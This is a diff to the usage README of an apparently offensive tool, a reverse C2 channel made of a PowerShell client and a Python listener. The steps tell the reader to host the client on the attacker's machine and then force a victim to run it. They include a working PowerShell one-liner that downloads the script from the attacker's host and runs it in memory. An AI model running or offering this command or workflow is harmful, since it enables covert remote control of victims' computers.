lsecqt/Reverse-C2-Channel/README.md

 # How to use:
 1. Open client.ps1 with any text editor and modify your IP / Port
-2. Host both listener.py and client.ps1 to the attacker's box or C2 infrastructure server
+2. Host both listener.py and client.ps1 to the attacker's box (python3 -m http.server 80)
 3. Force the victim to remotely run and execute the powershell script in memory (for example: powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')"